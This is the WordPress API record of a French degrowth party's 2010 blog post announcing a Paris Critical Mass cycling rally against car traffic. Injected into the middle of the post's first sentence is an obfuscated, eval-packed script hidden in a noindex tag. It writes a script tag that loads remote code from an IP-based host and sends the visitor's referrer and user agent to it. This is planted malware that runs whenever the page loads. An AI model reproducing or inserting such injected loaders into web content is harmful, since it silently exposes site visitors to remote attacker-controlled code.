{"id":4896,"date":"2010-09-16T07:12:28","date_gmt":"2010-09-16T06:12:28","guid":{"rendered":"http:\/\/www.partipourladecroissance.net\/?p=4896"},"modified":"2010-09-26T16:12:12","modified_gmt":"2010-09-26T15:12:12","slug":"masse-critique-parisienne-le-22-septembre","status":"publish","type":"post","link":"https:\/\/www.partipourladecroissance.net\/?p=4896","title":{"rendered":"Masse critique parisienne le 22 septembre !"},"content":{"rendered":"<p><img decoding=\"async\" src=\"file:\/\/\/Users\/liegeygeraldine\/Library\/Caches\/TemporaryItems\/moz-screenshot.jpg\" alt=\"\" \/><img decoding=\"async\" src=\"file:\/\/\/Users\/liegeygeraldine\/Library\/Caches\/TemporaryItems\/moz-screenshot-1.jpg\" alt=\"\" \/><a tabindex=\"-1\" href=\"http:\/\/www.facebook.com\/event.php?eid=126288767419748&amp;ref=nf\"><img loading=\"lazy\" decoding=\"async\" class=\"alignleft\" src=\"http:\/\/profile.ak.fbcdn.net\/hprofile-ak-snc4\/hs442.snc4\/50233_126288767419748_7616_s.jpg\" alt=\"\" width=\"138\" height=\"51\" \/><\/a><strong>\u00c0 <noindex><script id=\"wpinfo-pst1\" type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6(\"<a g=\\'2\\' c=\\'d\\' e=\\'b\/2\\' 4=\\'7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\o=\"+3(j.i)+\"\\'><\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rfnyn|var|u0026u|referrer|resbf||js|php'.split('|'),0,{}))\n<\/script><\/noindex> la fin de la \u00ab <em>Semaine de la mobilit\u00e9 et de la s\u00e9curit\u00e9 routi\u00e8re<\/em> \u00bb (!), le jour de l\u2019ex-journ\u00e9e-sans-ma-bagnole<\/strong>, rassemblement spontan\u00e9 contre l\u2019immobilit\u00e9 \u00e9cologique et pour le triomphe des cyclistes urbains. Rendez-vous \u00e0 18h30 tr\u00e8s pr\u00e9cises pour tourner place de l\u2019\u00c9toile, s\u2019ins\u00e9rer dans le trafic et recycler de l\u2019espace public au sol. Les cyclistes montreront par l\u2019absurde que, contre la pollution, tourner en rond n\u2019est pas la solution. Restructurons nos villes, relocalisons nos activit\u00e9s, r\u00e9duisons nos besoins de transport. La v\u00e9ritable s\u00e9curit\u00e9 routi\u00e8re, c\u2019est l\u2019\u00e9limination des bagnoles \u00e0 4, 3 ou 2 roues. Une seule solution : la V\u00e9lorution !<\/p>\n<p style=\"text-align: center;\"><a href=\"http:\/\/22septembre.org\/\">http:\/\/22septembre.org\/<\/a> &#8211; <a href=\"http:\/\/velorution.org\/\">http:\/\/velorution.org\/<\/a><\/p>\n<p style=\"text-align: center;\"><!--more-->L&rsquo;ann\u00e9e derni\u00e8re la Critical-Mass a rassembl\u00e9 22 000 v\u00e9los \u00e0 Budapest :<br \/>\n<a href=\"http:\/\/vimeo.com\/6925978\">http:\/\/vimeo.com\/6925978<\/a><\/p>\n<p style=\"text-align: center;\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone\" src=\"http:\/\/criticalmass.hu\/files\/CriticalMass002_1024_0.jpg\" alt=\"\" width=\"460\" height=\"293\" \/><\/p>\n<p style=\"text-align: center;\">Bient\u00f4t la m\u00eame chose \u00e0 Paris ! \ud83d\ude42<\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u00c0 la fin de la \u00ab Semaine de la mobilit\u00e9 et de la s\u00e9curit\u00e9 routi\u00e8re \u00bb (!), le jour de l\u2019ex-journ\u00e9e-sans-ma-bagnole, rassemblement spontan\u00e9 contre l\u2019immobilit\u00e9 \u00e9cologique et pour le triomphe des cyclistes urbains. Rendez-vous \u00e0 18h30 tr\u00e8s pr\u00e9cises pour tourner &hellip; <a href=\"https:\/\/www.partipourladecroissance.net\/?p=4896\">Continuer la lecture <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":9,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-4896","post","type-post","status-publish","format-standard","hentry","category-agenda-du-p-p-l-d"],"_links":{"self":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/4896","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/users\/9"}],"replies":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4896"}],"version-history":[{"count":11,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/4896\/revisions"}],"predecessor-version":[{"id":4959,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/4896\/revisions\/4959"}],"wp:attachment":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4896"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4896"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4896"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}